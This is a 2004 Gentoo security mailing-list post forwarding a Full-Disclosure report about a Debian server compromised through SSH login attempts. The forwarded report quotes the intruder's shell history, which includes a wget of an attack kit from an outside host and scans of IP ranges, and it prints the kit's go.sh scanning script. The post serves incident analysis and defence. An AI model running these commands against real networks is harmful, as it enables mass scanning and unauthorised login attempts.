From: Dan Margolis <krispykringle@g.o>
To: gentoo-security@l.g.o
Subject: [gentoo-security] [Fwd: [Full-Disclosure] Re: Automated SSH login attempts?]
Date: Thu, 29 Jul 2004 17:50:33
2 Hash: SHA1
3
4 I grabbed the tgz before it's too late. I plan on running it with a
5 sniffer so I can see what it's doing--that should indicate whether it's
6 really using some unknown ssh exploit (I'm afraid I'm not a whiz at
7 disassembly, so I'd rather not take that route). I tend to think it's
8 not; there was an OpenSSH vuln a while back that this guy's Debian
9 machine might still be vulnerable to, if it wasn't patched in a year. If
10 there were an unknown vulnerability, he'd be having a lot more success
11 and we'd be seeing this a whole lot more (unless we're all rooted and
12 don't know it).
13
14 Anyone have any more information on this?
15
16 - -------- Original Message --------
17
18 From: Stefan Janecek <stefan.janecek@×××.at>
19 To: full-disclosure@××××××××××××.com
22 Hmmm - I have also been getting those login attemps, but thought them to
23 be harmless. Maybe they are not *that* harmless, though... Today I
24 managed to get my hands on a machine that was originating such login
25 attempts. I must admit I am far from being a linux security expert, but
26 this is what I've found out up to now:
27
28 Whoever broke into the machine did not take any attempts to cover up his
29 tracks - this is what I found in /root/.bash_history:
30
31 - ------
32 id
33 uname -a
34 w
35 id
36 ls
37 wgte frauder.us/linux/ssh.tgz
38 wget frauder.us/linux/ssh.tgz
39 tar xzvf ssh.tgz
40 tar xvf ssh.tgz
41 ls
42 cd ssh
43 ls
44 ./go.sh 195.178
45 ls
46 pico uniq.txt
47 vi uniq.txt
48 ls
49 rm -rf uniq.txt
50 ./go.sh 167.205
51 ls
52 rm -rf uniq.txt vuln.txt
53 ./go.sh 202.148.20
54 ./go.sh 212.92
55 ./go.sh 195.197
56 ./go.sh 147.32
57 ./go.sh 213.168
58 ./go.sh 134.176
59 ./go.sh 195.83
60 - ------
61
62 um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two
63 binaries:
64
65 go.sh:
66 - -------
67 ./ss 22 -b $1 -i eth0 -s 6
68 cat bios.txt |sort | uniq > uniq.txt
69 ./sshf
70 - -------
71
72 * 'ss' apparently is some sort of portscanner
73 * 'sshf' connects to every IP in uniq.txt and tries to log in as user
74 'test' first, then as user 'guest' (according to tcpdump).
75
76 This does not seem to be a stupid brute force attack, as there is only
77 one login attempt per user. Could it be that the tool tries to exploit
78 some vulnerability in the sshd, and just tries to look harmless by using
79 'test' and 'guest' as usernames?
80
81 The compromised machine was running an old debian woody installation
82 which had not been upgraded for at least one year, the sshd version
83 string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10'
84
85 As already mentioned, I am far from being an expert, but if I can assist
86 in further testing, then let me know. Please CC me, I am not subscribed
87 to the list.
88
89 cheers,
90 Stefan